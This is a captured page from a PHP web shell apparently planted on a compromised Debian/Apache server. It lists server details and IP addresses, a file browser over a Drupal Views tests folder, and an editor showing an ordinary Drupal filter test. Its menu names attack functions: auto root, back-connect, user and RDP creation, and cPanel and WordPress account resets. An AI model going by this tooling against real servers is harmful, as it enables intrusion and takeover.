Linux polon 4.19.0-27-amd64 #1 SMP Debian 4.19.316-1 (2024-06-25) x86_64
Apache/2.4.59 (Debian)
: 10.2.73.233 | : 18.222.91.173
Cant Read [ /etc/named.conf ]
5.6.40-64+0~20230107.71+debian10~1.gbp673146
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
baltic /
web /
modules /
views /
tests /
handlers /
[ HOME SHELL ]
Name
Size
Permission
Action
views_handler_area_text.test
1.75
KB
-rw-r--r--
views_handler_argument_null.te...
2.05
KB
-rw-r--r--
views_handler_argument_string....
3.46
KB
-rw-r--r--
views_handler_field.test
15.29
KB
-rw-r--r--
views_handler_field_boolean.te...
4.22
KB
-rw-r--r--
views_handler_field_counter.te...
1.94
KB
-rw-r--r--
views_handler_field_custom.tes...
1.12
KB
-rw-r--r--
views_handler_field_date.test
3.65
KB
-rw-r--r--
views_handler_field_file_exten...
2.04
KB
-rw-r--r--
views_handler_field_file_size....
1.89
KB
-rw-r--r--
views_handler_field_math.test
1.04
KB
-rw-r--r--
views_handler_field_url.test
1.43
KB
-rw-r--r--
views_handler_field_xss.test
1.27
KB
-rw-r--r--
views_handler_filter_combine.t...
2.3
KB
-rw-r--r--
views_handler_filter_date.test
8.21
KB
-rw-r--r--
views_handler_filter_equality....
4.16
KB
-rw-r--r--
views_handler_filter_in_operat...
4.69
KB
-rw-r--r--
views_handler_filter_numeric.t...
9.88
KB
-rw-r--r--
views_handler_filter_string.te...
21.97
KB
-rw-r--r--
views_handler_sort.test
3.27
KB
-rw-r--r--
views_handler_sort_date.test
5.84
KB
-rw-r--r--
views_handler_sort_random.test
2.56
KB
-rw-r--r--
views_handlers.test
1.77
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : views_handler_filter_combine.test
<?php /** * @file * Definition of ViewsHandlerFilterCombineTest. */ /** * Tests the combine filter handler. */ class ViewsHandlerFilterCombineTest extends ViewsSqlTest { var $column_map = array(); public static function getInfo() { return array( 'name' => 'Filter: Combine', 'description' => 'Tests the combine filter handler.', 'group' => 'Views Handlers', ); } function setUp() { parent::setUp(); $this->column_map = array( 'views_test_name' => 'name', 'views_test_job' => 'job', ); } protected function getBasicView() { $view = parent::getBasicView(); $fields = $view->display['default']->handler->options['fields']; $view->display['default']->display_options['fields']['job'] = array( 'id' => 'job', 'table' => 'views_test', 'field' => 'job', 'relationship' => 'none', ); return $view; } public function testFilterCombineContains() { $view = $this->getBasicView(); // Change the filtering. $view->display['default']->handler->override_option('filters', array( 'age' => array( 'id' => 'combine', 'table' => 'views', 'field' => 'combine', 'relationship' => 'none', 'operator' => 'contains', 'fields' => array( 'name', 'job', ), 'value' => 'ing', ), )); $this->executeView($view); $resultset = array( array( 'name' => 'John', 'job' => 'Singer', ), array( 'name' => 'George', 'job' => 'Singer', ), array( 'name' => 'Ringo', 'job' => 'Drummer', ), array( 'name' => 'Ginger', 'job' => NULL, ), ); $this->assertIdenticalResultset($view, $resultset, $this->column_map); } /** * Additional data to test the NULL issue. */ protected function dataSet() { $data_set = parent::dataSet(); $data_set[] = array( 'name' => 'Ginger', 'age' => 25, 'job' => NULL, 'created' => gmmktime(0, 0, 0, 1, 2, 2000), ); return $data_set; } /** * Allow {views_test}.job to be NULL. */ protected function schemaDefinition() { $schema = parent::schemaDefinition(); unset($schema['views_test']['fields']['job']['not null']); return $schema; } }
Close